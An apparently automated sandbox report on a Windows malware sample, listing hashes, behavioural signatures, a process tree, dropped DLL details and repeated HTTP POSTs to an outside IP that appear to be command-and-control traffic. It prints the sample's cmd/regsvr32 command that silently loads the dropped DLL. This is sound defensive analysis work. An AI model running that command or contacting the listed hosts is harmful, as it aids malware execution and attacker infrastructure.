Analysis

  • max time kernel
    152s
  • max time network
    198s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    05/12/2022, 14:03 UTC

General

  • Target

    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe

  • Size

    179KB

  • MD5

    8155b71a2e4562b5e682d22f0010bd24

  • SHA1

    6a9bc4ae28b678ec766ccc6e1e80bd8e0216f3f5

  • SHA256

    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b

  • SHA512

    8966917fa4607935d370704ecab41461615239258419891ae70de086956f86fda693f9070e09da25cff110e51e75806ff92c943c914839f885fe168c4929a65a

  • SSDEEP

    3072:X875giexVu7fhrnv6MJQPRu2uuQ6ET31Ap0A+GpMWLHJiFp3:slPex8VuMepBLRLpiz

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    "C:\Users\Admin\AppData\Local\Temp\649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe"
    1⤵
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\regsvr32.exe /s "C:\ProgramData\2266\msseedir.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:856
      • C:\Windows\SysWOW64\regsvr32.exe
        C:\Windows\system32\regsvr32.exe /s "C:\ProgramData\2266\msseedir.dll"
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:1340

Network

  • flag-unknown
    DNS
    selftestingmultiformat.org
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    8.8.8.8:53
    Request
    selftestingmultiformat.org
    IN A
    Response
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:31 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:41 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:52 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:03 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:14 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:25 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:36 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:47 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:58 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:50:09 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2676
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:33 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    +K��M"��mr����Qdɻ8��%��(Y��i��1_��o�� "��xM��9��x_ޝ��r��wȮY��0j��X��
    $����9"����_��p0��Dчp"����sm����RL��"��~Q��^c��n��@/��w��F)��Ld��> ��X��>��[9��:K����:.��]B��5k��Z��4n��Z��)t��D��p'��H��#��Jd�� ޺j~��'+��n��c��J'݅{��O9��{��U?��e5��G��i!��&G��E"��7M��Rm��M��u*��BȢ4r��HCͼxm��N^׺~n��3��\t��(T��N=ǧnn�� ��On��?N��K/��?N��j��/i��F��f(��VT��xd��OR��~b��t/��@��`4��R��cr��Ԩ
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    +K��M"��mr����Qdɻ8��%��(Y��i��1_��o�� "��xM��9��x_ޝ��r��wȮY��0j��X�� $����9"����_��p0��Dчp"����sm����RL��"��~Q��^c��n��@/��w��F)��Ld��> ��X��>��[9��:K����:.��]B��5k��Z��4n��Z��)t��D��p'��H��#��Jd�� ޺j~��'+��n��c��J'݅{��O9��{��U?��e5��G��i!��&G��E"��7M��Rm��M��u*��BȢ4r��HCͼxm��N^׺~n��3��\t��(T��N=ǧnn�� ��On��?N��K/��?N��j��/i��F��f(��VT��xd��OR��~b��t/��@��`4��R��cr��Ԩ D��U4��0@��Q4��a��4$��XM��qm��@]��ts��@D��nu��^��:��x��:5��HZ��..ɓ`k��&��Cn��(N��`��7+ז��1'��-��c_�� 9��ZP��;<���� '��rB��6��cC��/ӆ,��/��*��3��+��W;��y��K1��z��;c��^C��?'����1.��;c̛I ��/x��F ��*+�� ��09����lk����i$΁P��bp��SA��}w��NG��i��IX��yR�� ��uF��#/̯BC��ih��YY��!a��l��}˗S��:e��E��9u��E��tt��DZ��ti��9��Vs��"S��Q&��qe��QW��cw��UW��1>��^P��~�� k��*Fϊh��0[̍o��4A��r��*F��C%˙0J��Ğe}��&V��f��44��]G��4%��UG��uoAF��awӞQY��aj��P[��~m��M]��G��5��S ޹:x��VX��}x��LK��t}����h~����puǍPD��`j��V\��gn��IZ��j�� ��ef��E0��0Q��sz��AJ��a��k��a ��k�� C��j��4[��u��2C��q��-E��u��8��cW��#��lP��p��+P��`��bX��0=��CI��!<��CP��np��@@��pr�� C��<m��\��C5��,F��Xfނ+�� P��+b��B��/b��A ��,+��B_��'��K��&e��U�� aͧO��'ʝPOST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2676
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:44 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2676
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:54 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:05 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:16 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:27 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:38 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:49 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:50:00 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:50:11 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • 198.58.109.201:80
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    http
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    4.2kB
    7.3kB
    28
    21

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404
  • 198.58.109.201:80
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    http
    regsvr32.exe
    32.6kB
    8.0kB
    45
    37

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    +K��M"��mr����Qdɻ8��%��(Y��i��1_��o�� "��xM��9��x_ޝ��r��wȮY��0j��X�� $����9"����_��p0��Dчp"����sm����RL��"��~Q��^c��n��@/��w��F)��Ld��> ��X��>��[9��:K����:.��]B��5k��Z��4n��Z��)t��D��p'��H��#��Jd�� ޺j~��'+��n��c��J'݅{��O9��{��U?��e5��G��i!��&G��E"��7M��Rm��M��u*��BȢ4r��HCͼxm��N^׺~n��3��\t��(T��N=ǧnn�� ��On��?N��K/��?N��j��/i��F��f(��VT��xd��OR��~b��t/��@��`4��R��cr��Ԩ

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404
  • 8.8.8.8:53
    selftestingmultiformat.org
    dns
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    72 B
    154 B
    1
    1

    DNS Request

    selftestingmultiformat.org

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\2266\msseedir.dll

    Filesize

    92KB

    MD5

    7cb12175da81309e26bb86cd25c49540

    SHA1

    86b7de2a4a84b82ef19e0626b34edda01e46c93d

    SHA256

    3c3c6e8eaccf40b723d6225fdfb58a29e42c8071406bf70ef427c59fae21ea85

    SHA512

    22172711f774a1163e6b25d6c229b925f87d088c0cb494b0c827bd4c6e0d153352048739a2254ce0ea364f45c74710da13a53fa256992feb1f31861bdc8d4631

  • \ProgramData\2266\msseedir.dll

    Filesize

    92KB

    MD5

    7cb12175da81309e26bb86cd25c49540

    SHA1

    86b7de2a4a84b82ef19e0626b34edda01e46c93d

    SHA256

    3c3c6e8eaccf40b723d6225fdfb58a29e42c8071406bf70ef427c59fae21ea85

    SHA512

    22172711f774a1163e6b25d6c229b925f87d088c0cb494b0c827bd4c6e0d153352048739a2254ce0ea364f45c74710da13a53fa256992feb1f31861bdc8d4631

  • memory/1340-72-0x0000000010000000-0x0000000010020000-memory.dmp

    Filesize

    128KB

  • memory/1340-71-0x00000000002C0000-0x00000000002D7000-memory.dmp

    Filesize

    92KB

  • memory/1340-70-0x0000000010000000-0x0000000010020000-memory.dmp

    Filesize

    128KB

  • memory/1340-69-0x00000000002C0000-0x00000000002D7000-memory.dmp

    Filesize

    92KB

  • memory/1792-58-0x0000000000400000-0x0000000000444000-memory.dmp

    Filesize

    272KB

  • memory/1792-63-0x0000000000230000-0x0000000000246000-memory.dmp

    Filesize

    88KB

  • memory/1792-62-0x0000000000260000-0x0000000000277000-memory.dmp

    Filesize

    92KB

  • memory/1792-61-0x0000000000230000-0x0000000000246000-memory.dmp

    Filesize

    88KB

  • memory/1792-60-0x0000000000260000-0x0000000000277000-memory.dmp

    Filesize

    92KB

  • memory/1792-59-0x0000000000230000-0x0000000000250000-memory.dmp

    Filesize

    128KB

  • memory/1792-54-0x0000000000260000-0x0000000000293000-memory.dmp

    Filesize

    204KB

  • memory/1792-57-0x0000000000260000-0x0000000000293000-memory.dmp

    Filesize

    204KB

  • memory/1792-56-0x0000000000260000-0x0000000000277000-memory.dmp

    Filesize

    92KB

  • memory/1792-55-0x00000000760A1000-0x00000000760A3000-memory.dmp

    Filesize

    8KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.